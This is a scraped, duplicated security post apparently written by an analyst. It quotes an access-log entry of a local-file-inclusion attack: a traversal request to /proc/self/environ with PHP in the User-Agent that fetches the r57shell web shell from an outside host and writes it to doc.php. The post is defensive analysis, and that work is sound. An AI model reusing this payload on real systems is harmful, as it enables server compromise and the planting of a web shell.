PHP in the user agent (attacking log analysis tools?)
2010-03-16 11:05
295 查看
Lately I started to see a few web-based attacks with a php script inside the user agent. Something like this:
a.b.229.82 - - [19/Jan/2010:22:43:39 -0700]
"GET /index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../..
/../../proc/self/environ HTTP/1.1" 200 3820 "-" "< ? echo
'_rce_';echo php_uname();echo '_rce_';$ch=curl_init();curl_setopt($ch, CURLOPT_URL,
'http://websalesusa.com/ken');curl_setopt($ ch, CURLOPT_CONNECTTIMEOUT, 15);curl_setopt($ch,
CURLOPT_TIMEOUT, 15);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$cont=curl_exec($ch);
curl_close($ch);$fh=fopen('doc.php', 'w' );fwrite($fh, $cont);fclose($fh); ?>
"
So, inside the user agent it is starting a PHP script that tries to download the file http://websalesusa.com/ken, which is the r57shell.php.
My guess is that it is trying to exploit a web stats or log analysis tool (like webalizer, google analytics, ossec, etc), but I couldn't find which one is vulnerable to that. Any ideas?
**this is what the r57shell looks like: http://sucuri.net/?page=tools&title=blacklist&seeall=1&detail=eadbf8dc38276dba3df4d6db9608db74
a.b.229.82 - - [19/Jan/2010:22:43:39 -0700]
"GET /index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../..
/../../proc/self/environ HTTP/1.1" 200 3820 "-" "< ? echo
'_rce_';echo php_uname();echo '_rce_';$ch=curl_init();curl_setopt($ch, CURLOPT_URL,
'http://websalesusa.com/ken');curl_setopt($ ch, CURLOPT_CONNECTTIMEOUT, 15);curl_setopt($ch,
CURLOPT_TIMEOUT, 15);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$cont=curl_exec($ch);
curl_close($ch);$fh=fopen('doc.php', 'w' );fwrite($fh, $cont);fclose($fh); ?>
"
So, inside the user agent it is starting a PHP script that tries to download the file http://websalesusa.com/ken, which is the r57shell.php.
My guess is that it is trying to exploit a web stats or log analysis tool (like webalizer, google analytics, ossec, etc), but I couldn't find which one is vulnerable to that. Any ideas?
**this is what the r57shell looks like: http://sucuri.net/?page=tools&title=blacklist&seeall=1&detail=eadbf8dc38276dba3df4d6db9608db74
相关文章推荐
- 异常:Invocation of com.google.gwt.user.tools.WebAppCreator failed. See the error log for more details
- Attacking Log Analysis Tools
- php出现[#2002 Cannot log in to the MySQL server]解决方法
- The hierarchy of the type UserOperateLogAdvisor is inconsistent
- php-fpm: hundreds of seconds in the log
- How to enable the uart log in user version
- TIP: when you get a message in job log user [Dr. Who] is not authorized to view the log
- 解决Mysql报错:PHP Warning: mysql_connect(): mysqlnd cannot connect to MySQL 4.1+ using the old insecure authentication.
- 解决Error (1133): Can’t find any matching row in the user table
- php中修改浏览器的User-Agent来伪装你的浏览器和操作系统
- Configuring the User Profile Service in SharePoint 2010
- A model for the structural, functional, and deontic specification of organizations in multiagent systems
- How to set the current user on the model instance in the admin:
- PHP屏蔽蜘蛛访问代码及常用搜索引擎的HTTP_USER_AGENT
- Unable to locate the Javac Compiler in: [ERROR] C:\Program Files\Java\jre7\..\lib\tools.jar
- PHP屏蔽蜘蛛访问代码及常用搜索引擎的HTTP_USER_AGENT
- IIS FTP 出现 530 User cannot log in, home Directory Inaccessible 错误
- PHP中通过HTTP_USER_AGENT判断是否为手机移动终端的函数代码
- Use The login user ,bring the person which in the same department ~!
- BI Java 补丁错误处理 :Cannot login to the SAP J2EE Engine using user and password as provided in the Filesystem Secure Store. Enter va